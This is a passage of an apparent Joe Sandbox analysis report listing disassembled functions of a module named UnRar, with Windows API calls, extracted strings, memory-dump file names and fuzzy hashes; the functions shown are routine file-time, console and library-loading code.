                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E5C
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E68
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E78
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E86
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E94
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2ED5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 008227df5bebd0d444b03da8700f41f0dd243d3b81a7e1a6ca51b00b453dd72a
                                                            • Instruction ID: 58e2596aded6e6261fe6994e42d0b087f7a83a93d5d3bb9e8b44f4f1186fb72f
                                                            • Opcode Fuzzy Hash: 008227df5bebd0d444b03da8700f41f0dd243d3b81a7e1a6ca51b00b453dd72a
                                                            • Instruction Fuzzy Hash: 7F515BB2B11651CAFB14DFB4D4401ACB7B1F758B88B91403ADE5E67B68EB38D542CB10
                                                            Function 00007FF7AACBDA04 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB433
                                                              • Part of subcall function 00007FF7AACDB3AC: LoadStringW.USER32 ref: 00007FF7AACDB44C
                                                            • GetStdHandle.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA5D
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA6D
                                                            • SetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDA7B
                                                            • ReadConsoleW.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDABC
                                                            • SetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,00007FF7AACBD6F7), ref: 00007FF7AACBDB03
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACBDB5A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Console$Mode$LoadString$HandleRead_invalid_parameter_noinfo_noreturnfflush
                                                            • String ID:
                                                            • API String ID: 1376255533-0
                                                            • Opcode ID: 485f5aca465dc1c45fc577ef5baa878c6cd38b458f01b5dfa9662c5db8524c87
                                                            • Instruction ID: 95a8b000d9a19473cf0103c56fe1bff0b8c3e1a8338cd2762484715c5206e178
                                                            • Opcode Fuzzy Hash: 485f5aca465dc1c45fc577ef5baa878c6cd38b458f01b5dfa9662c5db8524c87
                                                            • Instruction Fuzzy Hash: D031D562F16B42C5FA04AB74D8402BDA321FB45BE4F915271DA6D17BE9DE2CD4428320
                                                            Function 00007FF7AACE3374 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: b96f54fb1a7695cbdf6d461085c094cfc7a5ba12654ace23538fa012d1f063ce
                                                            • Instruction ID: 9d94cb2aa091e3d196ca4277fb5890ccce7127b4163f85c53c1adb4f5ce1a4db
                                                            • Opcode Fuzzy Hash: b96f54fb1a7695cbdf6d461085c094cfc7a5ba12654ace23538fa012d1f063ce
                                                            • Instruction Fuzzy Hash: EB313662B11A51CDFB10DFB5E8901AC7770FB18748B95503AEE4EA7A68EF38D486C710
                                                            Function 00007FF7AACCB924 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE31D0: GetSystemTime.KERNEL32(?,?,?,?,?,?,?,00007FF7AACCB965), ref: 00007FF7AACE31ED
                                                              • Part of subcall function 00007FF7AACE31D0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00007FF7AACCB965), ref: 00007FF7AACE31FD
                                                            • GetCurrentProcessId.KERNEL32 ref: 00007FF7AACCB98C
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC3F
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC45
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACCBC4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Time_invalid_parameter_noinfo_noreturn$System$CurrentFileProcess
                                                            • String ID: .rartemp
                                                            • API String ID: 3219218510-2558811017
                                                            • Opcode ID: d068138b5db6aa7c1a4083ee3f74bf3e71170de5e274bfcbafdce862f0090949
                                                            • Instruction ID: bf1ef967fa7853adfe5cd798c4eb0820e58e930d525815afe764144e99c13800
                                                            • Opcode Fuzzy Hash: d068138b5db6aa7c1a4083ee3f74bf3e71170de5e274bfcbafdce862f0090949
                                                            • Instruction Fuzzy Hash: 9591F722B19B81C2FB00EF65D4542ACA321FB84798F815275EE6D17BEADF38E546C350
                                                            Function 00007FF7AACF47E8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: abort$CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 2889003569-2084237596
                                                            • Opcode ID: d07774bda2da0d2cead86fb449f3fb2321784c544e5a3542296f2cd9fd032fa5
                                                            • Instruction ID: 1a1c4e90d91a051d3429405175afdc6f8e31f01dc29d6a011210b55eb71ae421
                                                            • Opcode Fuzzy Hash: d07774bda2da0d2cead86fb449f3fb2321784c544e5a3542296f2cd9fd032fa5
                                                            • Instruction Fuzzy Hash: 5091A173A09782CAF710EB64E5902ADBBA0F744788F51812AEF4D57B65DF38D196C700
                                                            Function 00007FF7AACF3A80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm$f
                                                            • API String ID: 2395640692-629598281
                                                            • Opcode ID: c04960aa3651e31c4b9b0b4a6cdd2ad6bbc945868174b6cb73cdb9ce17a3e8b6
                                                            • Instruction ID: a0acccf332f4cba0441d5227d0921b2ea66a778a0534e3e92d2508bf066a7a1e
                                                            • Opcode Fuzzy Hash: c04960aa3651e31c4b9b0b4a6cdd2ad6bbc945868174b6cb73cdb9ce17a3e8b6
                                                            • Instruction Fuzzy Hash: 0751C433A0B703E6FB58EF11E464A2DB755FB40B84F928174DA6A47758DF38E8429720
                                                            Function 00007FF7AACE2FB8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2DF4: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2E5C
                                                              • Part of subcall function 00007FF7AACE2DF4: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AACB59BF), ref: 00007FF7AACE2ED5
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACE302A
                                                            • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AACE3054
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Time$File$swprintf$LocalSystem
                                                            • String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
                                                            • API String ID: 1364621626-1794493780
                                                            • Opcode ID: 7d321ce817a0fdfb4af718e0bf1384aa42d63e94d5cefef4cfe5cba91e79b1c5
                                                            • Instruction ID: 97cd33b56e4598433b406038a206639d966d75d4fdec69da964dbb14828d1518
                                                            • Opcode Fuzzy Hash: 7d321ce817a0fdfb4af718e0bf1384aa42d63e94d5cefef4cfe5cba91e79b1c5
                                                            • Instruction Fuzzy Hash: 9321F776A19241CEF760DF68D48069DB7F0F758794F554072EE8893B58DB38E8428B20
                                                            Function 00007FF7AACF7158 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 2d0d250f74f57a742152c82858035fa5105717beccfc49530fec0c377f5d23f2
                                                            • Instruction ID: c5411afdc69a3ea31a7c110b080193d1bec576312b76e76eec5fe8da56d6c348
                                                            • Opcode Fuzzy Hash: 2d0d250f74f57a742152c82858035fa5105717beccfc49530fec0c377f5d23f2
                                                            • Instruction Fuzzy Hash: F3F04422A1A743C1FF44AB51F45427DA360EF88790F895076D99F46678DE3CD48AC720
                                                            Function 00007FF7AAD01C1C Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c65ad87da13dbd93674f671d60f6032d5c92e5445ebbcbbc346fb95e79a7d944
                                                            • Instruction ID: b48b2055dee1f4e6cce2f35c63018c7179e3c6aedb5912c64bf19bd090a130bb
                                                            • Opcode Fuzzy Hash: c65ad87da13dbd93674f671d60f6032d5c92e5445ebbcbbc346fb95e79a7d944
                                                            • Instruction Fuzzy Hash: 9CA1CA63A0A782C5FB616B618400379E691FF40794F864679E9BE077E9DF7CD4468320
                                                            Function 00007FF7AACFEDD8 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f573e83584cf72eb415a34c9f22b8e2aa7d20a919c3fa1a7db8c1d7476fd232a
                                                            • Instruction ID: 774f171254b6272e17b8ea5e3c6b8081ca834150d5b07f504376a2948051b104
                                                            • Opcode Fuzzy Hash: f573e83584cf72eb415a34c9f22b8e2aa7d20a919c3fa1a7db8c1d7476fd232a
                                                            • Instruction Fuzzy Hash: 1D81B023F1A713C5F721AB6994606BDA6A0FB44B98F8241B5DE5E136B5CF3CA447C320
                                                            Function 00007FF7AACCBE20 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2398171386-0
                                                            • Opcode ID: 1e5b648cc94bc06b6c9c8e6cf288b4a1f9d9ea443d3d2fc03fe58bfb1a1b5c5f
                                                            • Instruction ID: 4837edcb1ae41e79b716c679b433aa803715f0afe2a7ecb7c95372739bef6fba
                                                            • Opcode Fuzzy Hash: 1e5b648cc94bc06b6c9c8e6cf288b4a1f9d9ea443d3d2fc03fe58bfb1a1b5c5f
                                                            • Instruction Fuzzy Hash: 5851E622F09B42D9FB50EFB5E4003BDA361AB487A8F815275DE6D56BE9DF3894068310
                                                            Function 00007FF7AACFE74C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 67fea674869eec2a6b8490499bd49159970c66f08a9e76a5dfafc3bf99adbe2f
                                                            • Instruction ID: 53e5db98743fa5d7c81b916cdf4f756539e6ae1e7cb76d2eee4924f2e7162ee9
                                                            • Opcode Fuzzy Hash: 67fea674869eec2a6b8490499bd49159970c66f08a9e76a5dfafc3bf99adbe2f
                                                            • Instruction Fuzzy Hash: F251DF33A15A52CAF711DB29E4543ACBBB0FB44B98F458135DE5E47AA8DF38E142C320
                                                            Function 00007FF7AACF0AB0 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 262959230-0
                                                            • Opcode ID: 8bd564df447ac30776a41a00c7d2a18e3a8f4c3023ad317272d14ef43eaa7163
                                                            • Instruction ID: c2ea85d9c3c828e2b004d54d7f4a74e23a9ff563c78b71018833e0081d0b703b
                                                            • Opcode Fuzzy Hash: 8bd564df447ac30776a41a00c7d2a18e3a8f4c3023ad317272d14ef43eaa7163
                                                            • Instruction Fuzzy Hash: 2141B422A0A747D9FB54AF3198203BDA290FF04FA4F954674D96E577E9EE3CD4428320
                                                            Function 00007FF7AACC25EC Relevance: 7.6, APIs: 5, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FileSecurity_invalid_parameter_noinfo_noreturn$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1551570265-0
                                                            • Opcode ID: 0f984b96265fa5fff78f9baae8d59a95fa6a10874d8cd24b4bec1609ccf30dd6
                                                            • Instruction ID: 5e6d3b94cfff6412c872cd7c75e4b2567520c28acb23947de7c14bcde6dbc0c8
                                                            • Opcode Fuzzy Hash: 0f984b96265fa5fff78f9baae8d59a95fa6a10874d8cd24b4bec1609ccf30dd6
                                                            • Instruction Fuzzy Hash: 1C51B162F16752C5FB00FB65D4816BDA361EB447A4F8211B1DE5D23AA9EF38E487C320
                                                            Function 00007FF7AACFC7A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: d367f6124c47eb162298c6a48e7816a7c1f9b551d7818521d693f573aa8fc126
